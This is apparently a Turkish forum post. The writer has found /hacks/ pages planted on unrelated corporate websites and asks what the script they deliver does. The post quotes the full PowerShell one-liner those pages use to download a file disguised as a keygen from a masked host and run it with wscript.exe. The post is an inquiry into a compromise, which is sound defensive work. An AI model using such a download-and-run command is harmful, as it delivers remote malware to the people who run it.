Buradaki gariplik şu: Söz konusu siteler normalde bu tarz içeriklerle hiçbir ilgisi olmayan kurumsal siteler. Dolayısıyla bu içeriklerin site sahipleri tarafından bilinçli şekilde oluşturulduğunu düşünmüyorum.
Konuyu biraz daha incelediğimde /hacks/ altında yer alan içeriklerin neredeyse tamamında benzer bir kodla karşılaştım:
powershell -c "Invoke-WebRequest -Uri 'https://xxx.com/composer.php' -Outfile 'xxx_keygen_worked_x3.js'; Start-Process wscript.exe '.\xxx_keygen_worked_x3.js'"Anladığım kadarıyla kullanıcı ilgili butona tıkladığında PowerShell üzerinden xxx.com/composer.php adresine bir istek gönderiliyor. Sunucudan gelen içerik xxx_keygen_worked_x3.js adıyla bilgisayara kaydediliyor ve ardından wscript.exe kullanılarak bu JavaScript dosyası doğrudan çalıştırılıyor.
Asıl merak ettiğim nokta burası: Bu xxx_keygen_worked_x3.js dosyasının içerisinde ne var ve çalıştırıldığında bilgisayarda tam olarak ne yapıyor?
